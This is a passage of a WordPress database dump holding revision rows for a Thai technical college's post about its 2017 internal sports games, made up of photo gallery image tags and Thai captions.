(321, 1, '2018-01-06 14:41:15', '2018-01-06 07:41:15', '<img class=\"aligncenter size-full wp-image-303\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-302\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-305\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-04.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-301\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-03.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-304\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-05.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-307\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-06.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-319\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-07.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-316\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-08.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-318\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-09.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-314\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-10.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-300\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-11.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-317\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-12.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-315\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-13.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-306\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-14.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-313\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-15.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-312\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-16.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-310\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-17.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-308\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-18.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <img class=\"aligncenter size-full wp-image-309\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-19.jpg\" alt=\"\" width=\"628\" height=\"400\" /> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-20.jpg\"><img class=\"aligncenter size-medium wp-image-311\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-20-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '320-revision-v1', '', '', '2018-01-06 14:41:15', '2018-01-06 07:41:15', '', 320, 'http://sim.technicrayong.ac.th/?p=321', 0, 'revision', '', 0),
(322, 1, '2018-01-07 01:07:55', '2018-01-06 18:07:55', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-03.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-03-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-04.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-04-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-05.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-05-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-06.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-06-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-07.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-07-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-08.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-08-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-09.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-09-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-10.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-10-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-11.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-11-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-12.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-12-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-13.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-13-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-14.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-14-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-15.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-15-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-16.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-16-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-17.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-17-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-18.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-18-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-19.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-19-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-20.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-20-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\"', '\"เทคนิคระยองเกมส์\" ...', 'inherit', 'closed', 'closed', '', '320-autosave-v1', '', '', '2018-01-07 01:07:55', '2018-01-06 18:07:55', '', 320, 'http://sim.technicrayong.ac.th/?p=322', 0, 'revision', '', 0),
(323, 1, '2018-01-06 14:43:36', '2018-01-06 07:43:36', '<img class=\"aligncenter size-full wp-image-303\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-302\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-305\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-04.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-301\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-03.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-304\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-05.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-307\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-06.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-319\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-07.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-316\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-08.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-318\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-09.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-314\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-10.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-300\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-11.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-317\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-12.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-315\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-13.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-306\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-14.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-313\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-15.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-312\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-16.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-310\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-17.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-308\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-18.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-full wp-image-309\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-19.jpg\" alt=\"\" width=\"628\" height=\"400\" /> \r\n<img class=\"aligncenter size-medium wp-image-311\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-20-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" />', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '320-revision-v1', '', '', '2018-01-06 14:43:36', '2018-01-06 07:43:36', '', 320, 'http://sim.technicrayong.ac.th/?p=323', 0, 'revision', '', 0),
(324, 1, '2018-01-06 14:46:10', '2018-01-06 07:46:10', '<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg\"><img class=\"aligncenter size-medium wp-image-303\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\"><img class=\"aligncenter size-medium wp-image-302\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '320-revision-v1', '', '', '2018-01-06 14:46:10', '2018-01-06 07:46:10', '', 320, 'http://sim.technicrayong.ac.th/?p=324', 0, 'revision', '', 0),
(325, 1, '2018-01-06 14:48:14', '2018-01-06 07:48:14', '<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg\"><img class=\"aligncenter size-medium wp-image-303\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\"><img class=\"aligncenter size-medium wp-image-302\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '320-revision-v1', '', '', '2018-01-06 14:48:14', '2018-01-06 07:48:14', '', 320, 'http://sim.technicrayong.ac.th/?p=325', 0, 'revision', '', 0),
(326, 1, '2018-01-06 14:50:31', '2018-01-06 07:50:31', '<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\"><img class=\"aligncenter size-medium wp-image-302\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\"><img class=\"aligncenter size-medium wp-image-302\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '320-revision-v1', '', '', '2018-01-06 14:50:31', '2018-01-06 07:50:31', '', 320, 'http://sim.technicrayong.ac.th/?p=326', 0, 'revision', '', 0),
(327, 1, '2018-01-06 14:52:05', '2018-01-06 07:52:05', '<img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\" alt=\"\" /><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\" alt=\"\" />', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '320-revision-v1', '', '', '2018-01-06 14:52:05', '2018-01-06 07:52:05', '', 320, 'http://sim.technicrayong.ac.th/?p=327', 0, 'revision', '', 0),
(328, 1, '2018-01-06 14:53:26', '2018-01-06 07:53:26', '<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '320-revision-v1', '', '', '2018-01-06 14:53:26', '2018-01-06 07:53:26', '', 320, 'http://sim.technicrayong.ac.th/?p=328', 0, 'revision', '', 0),
(329, 1, '2018-01-06 14:54:06', '2018-01-06 07:54:06', '<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '320-revision-v1', '', '', '2018-01-06 14:54:06', '2018-01-06 07:54:06', '', 320, 'http://sim.technicrayong.ac.th/?p=329', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(330, 1, '2018-01-06 14:55:04', '2018-01-06 07:55:04', '<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '320-revision-v1', '', '', '2018-01-06 14:55:04', '2018-01-06 07:55:04', '', 320, 'http://sim.technicrayong.ac.th/?p=330', 0, 'revision', '', 0),
(331, 1, '2018-01-06 14:58:23', '2018-01-06 07:58:23', '<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-03-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-04-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-05-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-06-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-07-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-08-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-09-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-10-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-11.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-11-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-12.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-12-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-13.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-13-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-14.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-14-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-15.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-15-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-16.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-16-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-17.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-17-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-18.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-18-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-19.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-19-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-20.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-20-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a>', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '320-revision-v1', '', '', '2018-01-06 14:58:23', '2018-01-06 07:58:23', '', 320, 'http://sim.technicrayong.ac.th/?p=331', 0, 'revision', '', 0),
